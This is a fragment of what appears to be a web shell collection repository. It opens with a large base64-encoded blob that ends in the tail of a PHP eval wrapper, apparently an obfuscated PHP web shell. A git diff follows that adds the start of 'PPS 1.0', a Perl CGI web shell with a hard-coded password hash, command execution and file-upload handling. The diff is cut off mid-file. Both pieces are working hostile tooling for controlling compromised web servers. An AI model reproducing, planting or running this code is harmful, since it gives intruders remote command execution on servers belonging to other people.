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'\x29\x29\x29\x3B",".");?>
diff --git a/pl/pps-pl/pps-v1.0.pl b/pl/pps-pl/pps-v1.0.pl
new file mode 100644
index 00000000..dd9fb26e
--- /dev/null
+++ b/pl/pps-pl/pps-v1.0.pl
@@ -0,0 +1,173 @@
+#!/usr/bin/perl
+#################################################################################
+#PPS 1.0 - Perl-cgi web shell by Pashkela [BugTrack Team] © 2010               
+use Digest::MD5 qw(md5_hex);
+$Password = "63a9f0ea7bb98050796b649e85481845";# - root [md5]
+$WinNT = 0; # *nix=0,win=1
+$CommandTimeoutDuration = 10;# max time of command execution in console in seconds
+##################################################################################
+$NTCmdSep = "&";
+$UnixCmdSep = ";";
+$ShowDynamicOutput = 1;
+$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);$CmdPwd = ($WinNT ? "cd" : "pwd");$PathSep = ($WinNT ? "\\" : "/");$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");$LogFlag = false;use File::Basename;
+use MIME::Base64;sub cod($){my $url =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return $url;}
+sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in) = @_ if @_;local ($i, $loc, $key, $val);$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in = $ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $MultipartFormData & $WinNT;read(STDIN, $in, $ENV{'CONTENT_LENGTH'});}if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/){$Boundary = '--'.$1; @list = split(/$Boundary/, $in); $HeaderBody = $list[1]; $HeaderBody =~ /\r\n\r\n|\n\n/;$Header = $`;$Body = $';$Body =~ s/\r\n$//;$in{'filedata'} = $Body;$Header =~ /filename=\"(.+)\"/;$in{'f'} = $1;$in{'f'} =~ s/\"//g;$in{'f'} =~ s/\s//g;for($i=2; $list[$i]; $i++){$list[$i] =~ s/^.+name=$//;$list[$i] =~ /\"(\w+)\"/;$key = $1;$val = $';$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val =~ s/%(..)/pack("c", hex($1))/ge;$in{$key} = $val;}}else{@in = split(/&/, $in);foreach $i (0 .. $#in){$in[$i] =~ s/\+/ /g;($key, $val) = split(/=/, $in[$i],2);$key =~ s/%(..)/pack("c", hex($1))/ge;$val =~ s/%(..)/pack("c", hex($1))/ge;$in{$key} .= "\0" if (defined($in{$key}));$in{$key} .= $val;}}}sub uname{$s="uname -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|sed 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"';$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfree();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s.=" -U $q{u}" if($q{u});return $s;}
